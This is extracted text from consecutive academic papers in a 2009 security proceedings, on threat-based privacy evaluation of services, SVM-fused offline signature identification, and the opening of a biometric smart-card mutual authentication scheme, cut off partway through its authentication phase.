privacy data disclosures. The remainder of the paper is organized as follows. In Section 2, we present the architecture of proposed system. Section 3 gives details and related schemes used in the system and a running example is provided to demonstrate the system working. Finally, the conclusion is discussed in Section 4.

2 Architecture of Proposed System The functionality of the threat-based privacy preservation system is to provide an optimal service to users which ensure minimum hazard caused by potential data disclosure. It is achieved by three components i.e. Threat Evaluation (TE) engine, Data Evaluation (DE) engine and Service Evaluation (SE) engine. The architecture of proposed system is shown in Fig.1. TE engine presents what potential threats will arise by a privacy data disclosure. Firstly, system administrators define the type of potential threats and store them in TE engine. Each threat consists of related data elements and description of this hazard. We organize these threats using AND/OR tree hierarchies to specify which data element is under such threats. A clear description of potential threat helps users to clearly realize what results they have to suffer from the related data disclosure. Users

A Privacy-Aware System Using Threat-Based Evaluation and Feedback Method

195

Fig. 1. Threat-based Privacy Preservation System

can express their privacy preferences in the form of setting threat penalty values by using AHP approach. Users store their privacy preferences in the TE engine to judge the importance of the data elements and can access or modify their preferences at any time. Besides, in TE engine, users are allowed to reflect the threats which they faced in the provided services. The threat penalty values are decomposed into data penalty values through the AND/OR refinements that we mentioned above. Then, -

If threat t with penalty value P (t ) is AND-decomposed into data elements

d1 ,..., d n , then each data element gets a cumulative penalty value P(t ) / n , -

If threat t with penalty value P (t ) is OR-decomposed into data sets d1 ,..., d n , then each data set gets a cumulative penalty value P (t ) . By using AND-decomposition, the penalty value of each data set can be distributed to data elements.

In fact, AND-decomposition represents the occurrence of threat, which is caused by disclosing a set of data elements simultaneously, while OR-decomposition denotes the alternatives of data disclosure which produces the same threat. Then the DE engine sums up cumulative penalty values of each data element and produces final penalty values for each one. SE engine provides an interface for companies to allow them to declare the data which is required in the provided services. Based on the penalty values of data elements, SE engine calculates penalty values for services and provides the results to user. Also, based on the feedbacks supplied by users in the TE engine, SE engine will automatically map the threat(s) to the company which supplies these services. According to user’s individual estimates for threats, the service with minimum penalty value is provided and results in minimal hazards to the user. Thus, the privacy concerns of services can be customized, while the maximal privacy protection is guaranteed because the services were evaluated and ranked with criterion of threat penalty.

196

Y. Tian, B. Song, and E.-N. Huh

3 System Design 3.1 Evaluating Penalty Value of Single Service

In this section, we first present an example showing the threats, services, related data elements and providers. Then we assume there is a user who has evaluated threats. Using the evaluation method we proposed in another paper [10], the penalty value of each single service can be obtained. For simplicity, only few threats are defined in this example. Suppose Jim wants to select notification services which will not bring many awful potential hazards to him. First, he is acknowledged that there are five possible threats that may occur after providing his privacy data to the service providers. Those threats are listed in Table 1. Table 1. List of Threats

Then he sets correlated penalty values to each pair of threats, which are shown in Table 2. After mapping process, the penalty values of data elements are calculated and shown in Table 3. The related data “Home Address” has the penalty value with Table 2. Correlated Penalty Values

A Privacy-Aware System Using Threat-Based Evaluation and Feedback Method

197

Table 3. Penalty Values of Data Elements Related Data Element Email Address Home Address

Penalty Value 0.0526 0.1755

Telephone Number 0.4737 Cellphone Number 0.7316 Credit Card Number 0.3682 Name Zipcode

0.0702 0.0702

0.1755, which come from the value 0.0702 in JL threat and 0.1053 in JE threat. The penalty value on “Cell phone Number” is also a cumulative value, which combines 0.4737 and 0.1579 together. Table 4 presents seven available services provide by multiple companies as well as the required data elements. Table 4. Required Data Elements for Available services Service Delivery by post Door-to-door delivery Notification by phone Notification by Email Payment1 Payment2 Purchase

Company UUP MMS Noto Noto Paymate Epay Emarket

Data Element Name, Zipcode, Home Address Name, Home Address Name, Cellphone/Telephone Number Email Address Credit Card Number Credit Card Number Name, Email Address

The danger coefficient value to each company is given in Table 5. Table 5. Danger Coefficient Values of Companies Cr Company UUP MMS

Danger Coefficient Value 1.1 1.3

Noto Paymate Epay

1.2 1.2 1.1

Emarket

1.3

In Table 6, the penalty value for each service from different companies is presented. We rank the value from low to high where the service with the lowest value means most reliable and vice versa.

198

Y. Tian, B. Song, and E.-N. Huh Table 6. Credibility Rank of Services Provided by Each Company Service Notification by Email Purchase Door-to-door delivery Delivery by post Payment2 Payment1 Notification by phone

Company Noto Emarket MMS UUP Epay Paymate Noto

Penalty Value 0.0631 0.1696 0.3194 0.3365 0.4050 0.4418 0.6527

3.2 Basic Definitions for Hypergraph

So far, we have discussed the process that delivers the desired single service with the smallest privacy penalty to users. On the basis of this technique, we use a goaloriented approach to find customized privacy policies in complex service delivery environment. A directed hypergraph, called service composition graph (SCG), is applied to address the topology and service composition issues among different companies. We select FD-graph which is “a labeled graph with two kinds of nodes and two kinds of edges where decomposition arcs are mapped into nodes and the two types of arcs connect the decomposition node to the original nodes” [4]. The following definitions are based on [4]. Definition 1. Given a SCG Η = , where N is a set of nodes and A is a set of arcs, there exist two types of arcs: Aor is the set of OR-arcs representing ORdecompositions; Aand is the set of AND-arcs representing AND-decompositions. Also two types of node can be found in SCG: Ns ≡ S is a set of simple nodes; Nc is the set of compound nodes which are used for gathering the predecessor nodes from incoming OR-arcs. Thus, it can be also presented as Η = . In the sequel, we will use x for simple nodes, y for compound nodes and z for either simple or compound nodes.

∪

∪

Definition 2. Let P(x) be the penalty value of x and P(y) be the penalty value of y, we can get P(x) = P(sx) and P(y) = 0 where sx is the service represented by x. Definition 3. Let MP ( x ) be the minimum penalty value up to x and MP( y ) be the

minimum penalty value up to y, we can get: MP( x) = ∑ MP( z) + P( x) where z is any predecessor node of x; MP( y ) = min{MP( z )} where z is any predecessor node of y. In a SCG, we set one starting node z0 and MP( z0 ) = 0 . The optimization goal is to find a shortest path and calculate the minimum penalty value up to the goal node. The services on the shortest path are selected as the customized composition services for users. 3.3 Services Selection

The following Figure shows an example of services composition graph. As we can see from Fig. 2, the final service is “Purchase” which is provided by company “E-market”.

A Privacy-Aware System Using Threat-Based Evaluation and Feedback Method

199

Fig. 2. Services Composition Graph

It is a service combination of “Delivery”, “Payment” and “Notification”. “Delivery” can be achieved through “Delivery by post” service or “Door-to-door delivery” service provided by company “UUP” and “MMS” respectively. User can select “Payment” service from Company “Epay” or “Paymate”. In case of “Notification”, company “Noto” is the only service provider, but it provides two alternative services: “Notification by Cellphone” and “Notification by Email”. Now we assume a user has set penalty values for above services as we mentioned in Table 7. Then MinPenalty algorithm is applied to minimize the privacy cost and select best services for that user. The selection results are provided in Table 7. Table 7. Final Selection Results Service

Company

Penalty Value

Notification by Email Purchase Door-to-door delivery Payment2

Noto Emarket MMS Epay

0.0631 0.1696 0.3194 0.4050

4 Conclusion This paper presents a privacy preservation system for data management by analyzing the potential threats. The key contribution of our work is overcoming the limitation that users can not expect the hazards caused by disclosed data. The proposed system permits user to set a reasonable penalties on potential threats which were previously defined by system administrator, thus constitutes a shield for individuals’ privacy data to ensure an optimal service with the minimal data disclosure. In addition, we also provide a way for user to choose a most suitable service from a trusty company considering other users’ feedbacks. Finally, experimental results are given to evaluate our proposed system.

200

Y. Tian, B. Song, and E.-N. Huh

Acknowledgment This research was supported by the MKE (Ministry of Knowledge Economy), Korea, under the ITRC (Information Technology Research Center) support program supervised by the IITA (Institute of Information Technology Advancement) (IITA2009-C1090-0903-0011).

References 1. Jones, K.S.: Privacy: What’ different now? Interdiscip. Sci. Rev. 28(4), 287–292 (2003) 2. Guarda, P., Zannone, N.: Towards the development of privacy-aware systems. Information and Software Technology, pp. 337–350. Butterworth-Heinemann, Newton (2009) 3. Byun, J., Bertino, E., Li, N.: Purpose based access control of complex data for privacy protection. In: Symposium on Access Control Models and Technologies, pp. 102–110. ACM, New York (2005) 4. Byun, J.-W., Li, N.: Purpose Based Access Control for Privacy Protection in Relational Database, vol. 17(4), pp. 603–619. Springer, Heidelberg (2008) 5. Agrawal, R., Kiernan, J., Srikant, R., Xu, Y.: Hippocratic databases. In: Proceedings of the 28th VLDB Conference, Hong Kong, China, pp. 143–154 (2002) 6. Bresciani, P., Giorgini, P., Giunchiglia, F., Mylopoulos, J., Perini, A.: TROPOS: An agentoriented software development methodology. JAAMAS 8(3), 203–236 (2004) 7. Lin, C.-C., Wang, W.-C., Yu, W.-D.: Improving AHP for construction with an adaptive AHP approach(A3). Automation in Construction 17(2), 180–187 (2008) 8. Massacci, F., Mylopoulos, J.P., Zannone, N.: Hierarchical hippocratic databases with mnimal disclosure for virtual organizations. Springer, Heidelberg 9. Federal Trade Commission. Privacy online: Fair information practices in the electronic marketplace: A report to congress (May 2000), http://www.ftc.gov/reports/privacy2000/privacy2000.pdf 10. Tian, Y., Song, B., Huh, E.-n.: A Threat-based Privacy Preservation System in Untrusted Environment (in press)

Fusion of Multiple Matchers Using SVM for Offline Signature Identification Dakshina Ranjan Kisku1, Phalguni Gupta2, and Jamuna Kanta Sing3 1 Department of Computer Science and Engineering, Dr. B.C. Roy Engineering College, Durgapur – 713206, India 2 Department of Computer Science and Engineering, Indian Institute of Technology Kanpur, Kanpur – 208016, India 3 Department of Computer Science and Engineering, Jadavpur University, Kolkata – 700032, India {drkisku, jksing}@ieee.org, [email protected]

Abstract. This paper uses Support Vector Machines (SVM) to fuse multiple classifiers for an offline signature system. From the signature images, global and local features are extracted and the signatures are verified with the help of Gaussian empirical rule, Euclidean and Mahalanobis distance based classifiers. SVM is used to fuse matching scores of these matchers. Finally, recognition of query signatures is done by comparing it with all signatures of the database. The proposed system is tested on a signature database contains 5400 offline signatures of 600 individuals and the results are found to be promising. Keywords: Offline Signature Verification, Biometric Classifiers, Global and Local features, Distance Metrics, Support Vector Machines.

1 Introduction The use of biometric technologies [1] for human identity verification is growing rapidly in the civilized society and showing its advancement towards usability of biometric security artifacts. Offline signature verification [2], [3] is considered as a behavioral characteristic based biometric trait in the field of security and the prevention of fraud. Offline signature verification [2], [3] in comparison with other biometric traits such as fingerprint [4], face [7], palmprint [6], iris [5], etc has the advantage of wide acceptance. A significant amount of work on offline signature recognition is available to detect forgeries and to reduce the identification error. For example, a signature verification system using static and dynamic features and classification has been made using SVM in [8]. Different types of global features and feed-forward neural network are used in [9]. In [3], an offline Arabic signature verification system based on global and local features and multistage classifiers has been proposed. In [10] distance probability distribution, Naïve-Bayes and SVM classifiers have been used for verification. This paper presents offline signature identification by fusion of three classifiers using SVM [11], [12]. Three classifiers namely, Mahalanobis distance, Euclidean distance and the Gaussian empirical rule [13] devised from Gaussian distribution are D. Ślęzak et al. (Eds.): SecTech 2009, CCIS 58, pp. 201–208, 2009. © Springer-Verlag Berlin Heidelberg 2009

202

D.R. Kisku, P. Gupta, and J.K. Sing

fused to produce quality matching score using Support Vectors. The aim of this fusion classifier is to reduce the error rates in terms of skilled forgery detection [2] with less computational complexity. The overall performance depends on the quality of the matching scores produced by individual matchers. Due to lack of uniformity of the individual classifiers, the performance and accuracy are often degraded. To overcome the problem of non-uniformity, we present a fusion strategy based on the SVM to produce quality matching scores by fusing the individual matchers. The paper is organized as follows. Next section deals with extraction of global and local features from offline signatures. Section 3 introduces the three classifiers used for verification and matching scores generation. Fusion of the three classifiers accomplished by SVM in terms of matching score is discussed in Section 4. Section 5 presents experimental results and concluding remarks are given in the last section.

2 Preprocessing of Offline Signatures and Feature Extraction 2.1 Preprocessing Operations In order to improve the performance of the system, few preprocessing operations [3] are carried out on offline signatures. To recognize a person correctly and identify imposters through offline signatures, image enhancement operations are performed to raw signature images. The acquired signature images sometimes may contain extra pixels as noises which are due to some problems during scanning of signatures or due to non-availability of signatures in proper form. It is necessary to remove these extra pixels from the signatures; otherwise the signature may not be recognized correctly. For extracting global and local features [3] from preprocessed signatures, some image enhancements and morphological operations are applied on signature images after geometric normalization, such as binarization, smoothing, thinning and high pressure region extraction [14]. Geometric normalization is applied to scale the signature image to a standard normalized size using a resize algorithm with nearest neighbor interpolation. It preserves the aspect ratio of the signature image. In order to remove the salt-and-peeper noise and irrelevant data from signatures, median and mean filters are used. Noise free signature image is then converted to a binary image by using a threshold as discussed in [14]. Extraction of skeletonise signature can be useful for identification. A well known thinning operation called Canny Edge Detector algorithm is applied to binary image to obtain skeleton of the signature. Finally, we apply an algorithm which can be used to detect skilled forgeries by extracting the regions where the writer gives special emphasis on the higher ink density. Extraction of High Pressure Region (HPR) [14] image is paramount importance to identify forgeries in signatures by applying various ranges of thresholds between maximum and minimum gray levels. We have experimented with three factors such as 0.85, 0.55 and 0.75 and found that at a factor of 0.85, the amount of HPR is negligible and at a factor of 0.55, the HPR image is close to the original image. However, at a factor of 0.75, we have obtained an acceptable HPR image, which can be used for skilled forgery detection including other global and local geometric features.

Fusion of Multiple Matchers Using SVM for Offline Signature Identification

203

2.2 Global and Local Features Extraction Selection of discriminative features is crucial for any pattern recognition and classification problem. The proposed system uses three different statistical similarity measurement techniques applied to the extracted feature set consisting of geometric global and local features [3] separately. Matching scores are obtained from individual matchers and these different matchers or classifiers are fused using SVM. Global signature features [3] are extracted from the whole signature image. On the other hand, local geometric features [3] are extracted from signature grids. Moreover, each grid can be used to extract the same ranges of global features. Combination of these two types of global and local features is further used to determine the identity of authentic and forgery signatures successfully from the database. This set of geometric features is used as input to the identification system. In this regard, we consider handwritten signatures taken on paper template. Main aim of extraction of these heuristic geometric global and local features is to transform into a compact feature vector and to support similarity measurements for matching and identification by proper validation. In the proposed signature identification system, global features are extracted from signatures. These features can be used to describe the signature as a whole, i.e. the global pattern or characteristics of the signature. From each geometric normalized, binary, thinned and high pressure region signature image global features are extracted. We summarize the global features that are extracted as follows. • • • • • • • • • •

Width [3]: For a binary signature image, width is the distance between two points in the horizontal projection and must contain more than 3 pixels of the image. Height [3]: Height is the distance between two points in the vertical projection and must contain more than 3 pixels of the image for a binary image. Aspect ratio [3]: Aspect ratio is defined as width to height of a signature. Horizontal projection [3]: Horizontal projection is computed from both the binary and the skeletonised images. Number of black pixels is counted from the horizontal projections of binary and skeletonised signatures. Vertical projection [3]: A vertical projection is defined as the number of black pixels obtained from vertical projections of binary and skeletonised signatures. Area of black pixels [3]: Area of black pixels is obtained by counting the number of black pixels in the binary, thinned and HPR signature images, separately. Normalized area of black pixels is found by dividing the area of black pixels by the area of signature image (width*height) of the signature. Normalized area of black pixels is calculated from binary, thinned and HPR images. Center of gravity [3] of a signature image is obtained by adding all x, y locations of gray pixels and dividing it by the number of pixels counted. The resulting two numbers (one for x and other for y) is the center of gravity location. Maximum and minimum black pixels are counted in the vertical projection and over smoothened vertical projection. These are the highest and the lowest frequencies of black pixels in the vertical projection, respectively. Maximum and minimum black pixels are counted in the horizontal projection over smoothened horizontal projection. These are the highest and the lowest frequencies of black pixels in the horizontal projection, respectively.

204

D.R. Kisku, P. Gupta, and J.K. Sing

Fig. 1. Grid regions of a signature image

•

• •

Global baseline [3]: Vertical projection of binary signature image has one peak point and the global baseline corresponds to this point. Otherwise, the global baseline is taken as the median of two outermost maximum points. Generally, the global baseline is defined as the median of the pixel distribution. Upper and lower edge limits [3]: The difference between smoothened and original curves of vertical projection above the baseline and under the baseline is known as upper and lower edge limits, respectively. Middle zone [3]: It is the distance between upper and lower edge limits.

In the next stage, local features [3] are extracted from gray level, binary, thinned and HPR signature images. Each signature image is divided into 25 equal grid regions. From these grid regions, grid characteristics as local features are estimated, such as width, height, area of black pixels of each grid region, normalized area of black pixels, center of gravity, aspect ratio, horizontal and vertical projections, etc. The global features can also be considered as local features for each grid region. Grid regions are shown in Figure 1 for local features extraction. To obtain a set of global and local features, we combine both these features sets into a feature vector and the feature vector is then used to the classifiers for generating matching scores.

3 Matching Scores Generation Geometric global and local features contain information, which are effective for signature recognition. In order to recognize a signature correctly, one uses features set which can be not only useful for recognition, but also generate matching scores. Quality matching scores reflect the relative matching proximity between the instances of a class. To capture the maximum proximity of matching between signature instances, we use three different similarity measurement techniques for generating matching scores, such as Euclidean distance, Mahalanobis distance and Gaussian empirical rule. Using the concatenated global and local features we maximize the inter-class difference and minimize the intra-class difference. 3.1 Matching Score Generation Using Euclidean Distance Using Euclidian distance metric [13], similarity score between any two feature sets can be obtained in terms of the extracted features. The distance measure for a pair of signature samples is computed as ⎛ n 2 ⎞ ED = 1 / n⎜ ∑ C i × (( X i − M i ) 2 / σ i ) ⎟ ⎝ i =1 ⎠

1/ 2

(1)

Fusion of Multiple Matchers Using SVM for Offline Signature Identification

205

where n denotes the number of feature points extracted from a particular signature instance, Ci is a weight associated with each feature, Xi is the ith feature vector for the query signature, Mi and σi are the mean and standard division of the ith feature vector calculated over the authentic sample instances. 3.2 Matching Score Generation Using Mahalanobis Distance Mahalanobis distance [13] which is used for generating matching scores by comparing query signature with the database signatures and classifies patterns based on statistical differences. It determines the "similarity" between a set of feature values extracted from query signature and a set of features estimated from a database signatures by MD =

( f − μ x )C −1 ( f − μ x )

(2)

where MD is the Mahalanobis distance from the feature vector f to the mean vector μ x and C is the covariance matrix for f. This can be used in a minimum distance classifier as follows. If μ 1 , μ 2 ,...., μ n are the means for the n-classes and C1, C2,…,Cn are the corresponding covariance matrices, we classify a feature vector f by measuring the Mahalanobis distance from f to each of the means, and assigning the vector to the class for which Mahalanobis distance is found to be minimum. 3.3 Matching Score Generation Using Gaussian Empirical Rule Gaussian distribution [13] can accommodate around 99.7% of features or observations which fall within three standard deviation of the mean and which is between μ-3σ and μ+3σ. Feature points are considered as the features extracted from query signature images while mean and standard deviation are found from signature database. Each feature point is tested within the range of three standard deviation of the mean. Equation (3) is used to select some important feature points from a given signature. μ − x ≤ k *σ

(3)

where μ and σ are mean and standard deviation and x is the value of some feature extracted from signatures and k can be 1, 2, 3 and derived from Gaussian empirical properties to test the closeness of the current query sample to the distribution mean of database. A random distribution is created among the subset of signature instances corresponding to a database and from the subset of instances, mean and standard deviation are calculated in terms of extracted features and from the rest of the database, the discriminative global and local features are extracted. Hence from the distributed set, two subsets of samples of size let n1 and n2, n1 ≥ n2, are selected randomly to reduce the biasness among the samples. Mean and standard deviation are computed from n1 and Equation (3) is used to select distinguishable features from n2. Through the selection of client-specific features of database samples, the corresponding features of query sample also find out during matching. Finally, we compare the features obtained from the database with those of query signature and the numbers of total matching features are recorded as matching score.

206

D.R. Kisku, P. Gupta, and J.K. Sing

4 Fusion of Multiple Matchers Using Support Vector Machines The principle of SVM [11], [12] relies on a linear separation in a high dimension feature space where data are mapped to consider the eventual non-linearity of the problem. To get a good level of generalization capability, the margin between the separator hyperplane and the data is maximized. A SVM classifier is trained with matching score vectors mi, each of dimension M. The decision surface for pattern classification is as: f (m ) =

M

∑ α iy i K ( m , m i ) +

(4)

b

i =1

where αi is the Lagrange multiplier associated with pattern mi and K(ּ ,ּ ) is a kernel function that implicitly maps the matching vectors into a suitable feature space. If mk is linearly dependent on the other support vectors in feature space, i.e. K (m , m k ) =

M

∑ ci K (m , m i )

(5)

i =1 i≠k

where the ci are scalar constants, then the decision surface (4) can be written as M

f (m ) = ∑ α i y i K (m, mi ) + b

(6)

i =1 i≠k

From Equation (6), decision function is ⎧M ⎫ ⎪ ⎪ D( f (m )) = sign⎨∑ α i y i K (m, mi) + b * ⎬ i = 1 ⎪i≠k ⎪ ⎩ ⎭

(7)

Equation (7) is solved for αi and b* in its dual form with a standard QP solver which together with decision function (7), avoids manipulating directly the elements of f and starting the design of SVM for classification from the kernel function. In [12], the fusion strategy relies on the computation of the decision function D. The combined score FST M of the multimodal pattern m M can be calculated as:

∈

FS T =

∈

T

M

∑α i =1 i≠k

i

y i K (m , m i) + b *

R

(8)

These identification parameters can be adjusted to get various operating points. These operating points and the combined scores of the entire database are used to find the ranking of the signature owners belonging to the query signatures.

5 Experimental Results Experiment of the proposed technique is conducted on IIT Kanpur signature database consisting of 5400 signatures of 600 individuals of genuine and imposter users. Subjects are asked to contribute 9 signatures on the template without touching the border line on each region. Out of 5400 signatures, 3600 signatures of 400 individuals

Fusion of Multiple Matchers Using SVM for Offline Signature Identification

207

< --- Identif ic a tio n P ro bab ility --->

Cumulative Match Characteristics Curve (CMC) 1 0.95 0.9 0.85 SVM Based Fusion Mahalanobis Distance Euclidean Distance Gaussian Emirical Rule

0.8 0.75 0.7 0

2

4

6

8

10

12

14

16

18

20

<--- Rank --->

Fig. 2. Cumulative match characteristic curves for different methods

are genuine signatures and the rest are labeled as forgery signatures which are collected from the individuals who can fairly imitate the signatures. The signed template paper is scanned and resolution is set to 300 dpi. Matching scores are generated using the three classifiers. Genuine signatures of 400 subjects are matched through 6 signature instances as database for each subject and the remaining 3 signature instances are used for testing. Rest of the imitated signatures of 200 subjects is also matched against the genuine signatures in the database. As a result, 600 subjects having genuine and forgery signatures can generate three sets of matching scores while Euclidean distance, Mahalanobis distance and Gaussian empirical rule are used. Finally, these matching scores are fused using SVM. Rank order statistics and cumulative match characteristics (CMC) curve are used to measure the performance of the system. The matching probability of the database represents the rank obtained while matching is done with a probe signature. Figure 2 shows the CMC curves for the proposed system and the individual performances of the classifiers. The curves represent the trade-off between identification probabilities against rank. The identification rate for the proposed method is obtained as 97.17% while that based on Euclidean distance, Mahalanobis distance and Gaussian empirical rule are found to be 92.61%, 93.36% and 91.52% respectively.

6 Conclusion Score level fusion of multiple matchers for offline signature identification has been presented. The proposed system has used global and local features to the classifiers, namely, Euclidean, Mahalanobis distances and Gaussian empirical rule. Matching score is obtained by fusing these classifiers along with SVM. This system exhibits several advantages over independent matching. The first advantage is that the global and local features are found to be efficient for offline signature recognition. During preprocessing, HPR images are extracted from gray scale signatures and these images are useful for detecting skilled forgery efficiently. The second advantage is the improvement of identification rate because of the fusion of classifiers using Support

208

D.R. Kisku, P. Gupta, and J.K. Sing

Vector Machines at matching score level. The third advantage is the reduction of misidentification error by detecting the subjects correctly in the rank order statistics.

References 1. Jain, A.K., Ross, A., Prabhakar, S.: An Introduction to Biometric Recognition. IEEE Transactions on Circuits and Systems for Video Technology, Special Issue on Image- and Video-Based Biometrics 14(1), 4–20 (2004) 2. Justino, E.J.R., Bortolozzi, F., Sabourin, R.: Off-line Signature Verification Using HMM for Random, Simple and Skilled Forgeries. In: ICDAR 2001, International Conference on Document Analysis and Recognition, vol. 1, pp. 105–110 (2001) 3. Ismail, M.A., Gad, S.: Offline Arabic Signature Recognition and Verification. Pattern Recognition 33(10), 1727–1740 (2000) 4. Maltoni, D., Maio, D., Jain, A.K., Prabhakar, S.: Handbook of Fingerprint Recognition, 2nd edn. Springer, Heidelberg (2009) 5. Daugman, J.: How Iris Recognition Works. IEEE Transactions on Circuits and Systems for Video Technology 14(1), 21–30 (2004) 6. Duta, N., Jain, A.K., Mardia, K.V.: Matching of Palmprint. Pattern Recognition Letters 23(4), 477–485 (2002) 7. Li, S.Z., Jain, A.K. (eds.): Handbook of Face Recognition. Springer, Heidelberg (2005) 8. Lv, H., Wang, W., Wang, C., Zhuo, Q.: Offline Chinese Signature Verification based on Support Vector Machines. Pattern Recognition Letters 26(15), 2390–2399 (2005) 9. Bajaj, R., Chaudhuri, S.: Signature Verification using Multiple Neural Classifiers. Pattern Recognition 30(1), 1–7 (1997) 10. Xu, A., Srihari, S.N., Kalera, M.K.: Learning Strategies for Signature Verification. In: Proceedings of the International Workshop on Frontiers in Handwriting Recognition, pp. 161–166. IEEE Computer Society Press, Los Alamitos (2004) 11. Vapnik, V.N.: The Nature of Statistical Learning Theory. Springer, Heidelberg (1995) 12. Gutschoven, B., Verlinde, P.: Multi-Modal Identity Verification using Support Vector Machines (SVM). In: Proc. of the 3rd International Conference on Information Fusion (2000) 13. Kisku, D.R., Rattani, A., Sing, J.K., Gupta, P.: Offline Signature Verified with Multiple Classifiers: An Authentic Realization. In: International Conference on Advances in Computing, pp. 550–553 (2008) 14. Gonzalez, R.C., Woods, R.E.: Digital Image Processing, 2nd edn. (2000) 15. Huang, K., Yan, H.: Offline Signature Verification based on Geometric Feature Extraction and Neural Network Classification. Pattern Recognition 30(1), 9–17 (1997)

A Two-Factor Mutual Authentication Scheme Using Biometrics and Smart Card Sheikh Ziauddin Department of Computer Science and Information Management Asian Institute of Technology, Pathum Thani, Thailand [email protected]

Abstract. We present a remote authentication scheme that uses biometrics and smart card for its working. The security of our scheme relies on onewayness and collision-resistance of hash functions. We use error control codes to remove noise from biometric readings taken at different times. We provide a detailed security analysis and show that the proposed scheme is able to withstand many commonly known attacks against remote authentication schemes. In addition, the scheme does not store biometric templates on the server and provides mutual authentication between the user and the server.

1

Introduction

Remote authentication applications use one or more of the following three factors to authenticate a user: something the user knows (password), something the user has (hardware token), and something the user is (biometrics). Use of passwords is not suitable for high security applications because a password can be forgotten, compromised or guessed. Similarly hardware tokens can be forged, stolen or compromised. Due to these issues, most current authentication schemes use a combination of password and smart card instead of using one of these factors alone [1,2,6,7,12,16,17,20,21]. In contrast to passwords and smart cards, biometrics are impossible to forget and hard to steal, forge or compromise. But there are a few challenges to overcome before biometric data can securely be used for remote authentication. First, due to irrevocable nature of biometric templates, their central storage is extremely dangerous. As biometric data is monolithically bound to the human beings, a theft to biometric data is akin to theft of identity. Second, templates cannot be compared in hashed domain due to fuzziness (noise) of biometric data. In password-based systems, a one-way hash of the password is generally stored in the system such that it is not feasible to recover the password from the hashed value. When the user wants to authenticate, she enters her password, a hash of the entered password is generated and compared with the stored hash. Unfortunately, a similar technique will not work for biometric templates as templates of 

This work has been supported by a graduate fellowship from the Higher Education Commission of Pakistan.

´ ezak et al. (Eds.): SecTech 2009, CCIS 58, pp. 209–216, 2009. D. Sl  c Springer-Verlag Berlin Heidelberg 2009 

210

S. Ziauddin

the same user taken at different times are similar but not equal to each other. As hash funtions have the property that a small change in input is diffused over the entire output, the hashed value of two similar templates of the same user may be entirely different. In the past, some biometrics-based remote authentication schemes have been presented [10,11,13,9]. Unfortunately, these schemes store user’s biometric template on the smart card in the cleartext form. If an attacker steals the smart card, he also gets access to the biometric secret of the user. In addition, these schemes use three-factor authentication involving password, smart card, and biometrics. In this paper, we present a remote authentication scheme that does not store user’s biometric template anywhere. Instead, some auxiliary information generated from the template is stored on the smart card such that it is not feasible for an attacker to retrieve the user’s template from this auxiliary information. In addition, our scheme uses two factors (biometrics and smart card) hence relieves the user from remembering an additional password which makes our scheme more flexible and user-friendly. We use error control codes [14] to overcome the fuzziness of biometric templates as suggested by Juels and Wattenberg in their fuzzy commitment scheme [8]. The rest of this paper is organised as follows. In Section 2, we give a very brief introduction to the error control codes and fuuzy commitment scheme. In Section 3, we describe the security model of the proposed scheme. Section 4 explains the working of our scheme. We analyze the security of the scheme in Section 5 and finally, we conclude this paper in Section 6.

2 2.1

Background on Error Control Codes and Fuzzy Commitment Error Control Codes

In telecommunications, error control codes (ECC) are used to correct errors introduced during transmission over a noisy channel. Before transmitting a message, some redundancy is added to it to get a larger codeword (called encoding). This redundant data helps in reconstructing the transmitted codeword from the received codeword (called decoding). Each ECC can correct a certain number of errors in a received codeword called error correction capability of the code. 2.2

Fuzzy Commitment

Juels and Wattenberg [8] suggested that the biometric readings acquired from the same user at registration and authentication time can be treated as data transmitted and received over a noisy channel. Their fuzzy commitment scheme consists of two functions: the commitment function f and the decommitment function f  . The functions are as follows. f (c, W ) = (h(c), (c ⊕ W )) f  (W  , (c ⊕ W )) = W  ⊕ c ⊕ W = c

A Two-Factor Mutual Authentication Scheme

211

where c is a randomly selected codeword, W and W  are the biometric readings of the user at registration and authentication time, respectively, ⊕ represents an exclusive-or operation, and h() is a cryptographic hash function. The decommitment is successful if h(c) = h(c ).

3

Assumptions and Attack Model

In this section, we describe the security model of the proposed scheme. We enumerate the assumptions made about the scheme and describe the goals and capabilities of the attacker. Major points of our model are outlined as follows. – The user and the server participate honestly in the protocol. – The attacker cannot steal the server’s secret. – The attacker can steal either the user’s biometrics or the smart card, but not both. – The user and the server use synchronized clocks or they have access to a common trusted time server to get the current time. – During the registration phase, the protocol entities communicate through a secure and authenticated channel, i.e., the attacker can neither see nor modify the transmitted messages. – During the authentication phase, the protocol entities communicate through a public channel controlled by the attacker, i.e., the attacker can see all communication; he can add, edit, or delete any part of the communication; and he can also send fake messages to one entity claiming those to be originated from the other entity. – Once a smart card is stolen, all the stored information can be extracted by the attacker, e.g., by using reverse engineering techniques. – The information stored on the smart card cannot be overwritten, i.e., the smart card is tamper-resistant. – Biometric features are represented as a binary vector, e.g., binary iris templates [3,18,15]. – An efficient error control coding (ECC) scheme exists having the codeword size equal to the biometric template size and having sufficient error correction capability to achieve very high recognition performance in terms of false acceptance and false rejection rates. Many such schemes are known [5,19]. – Descriptions of hash, ECC encoding, and ECC decoding functions is known to all entities (user, smart card, server, and attacker).

4

Proposed Scheme

Our scheme is comprised of two phases: the registration phase and the authentication phase. First we describe the notation that we will use to denote the elements of the proposed scheme and then we explain the two phases of our scheme.

212

S. Ziauddin

ID k R SC T1 , T1 , T2 , T2 Δt h(·) E(·) D(·) ⊕ W, W  4.1

Identity of the user in a format suitable for the specific application Secret key of the server A user-specific secret pseudo-random number generated by the server Smart card issued by the server to the user Current timestamps taken at different times during the protocol run The maximum allowed network delay time for a single message passed between the user and the server A cryptographically secure hash function Encoding function of an error control code Decoding function of an error control code An exclusive-or operation Biometric templates of the user taken during registration and authentication phase, respectively

Registration Phase

The following steps are carried out during the registration phase. 1. The user takes a biometric scan to get a biometric template W and selects an arbitrary unique identity ID. 2. The user sends her ID along with her biometric template W to the server. 3. The server generates a pseudo-random number R. 4. The server calculates A = E(R) ⊕ W . 5. The server calculates B = h(ID ⊕ k) ⊕ h(R). 6. The server issues a smart card to the user that contains the values ID, A, and B. The registration phase of the proposed scheme is illustrated in Figure 1. User (U ) Input: W

Server (S) Input: k ID, W

Generate a pseudo-random number R A = E(R) ⊕ W B = h(ID ⊕ k) ⊕ h(R) Write (ID, A, B) on SC



SC

Fig. 1. Registration phase of the proposed scheme

4.2

Authentication Phase

During authentication phase, the user inserts her smart card to a card reader and presents a scan of her biometric trait to the biometric scanner. Next, the user (through the smart card) and the server communicate with each other for some time. A successful mutual authentication takes place if the user’s message

A Two-Factor Mutual Authentication Scheme

213

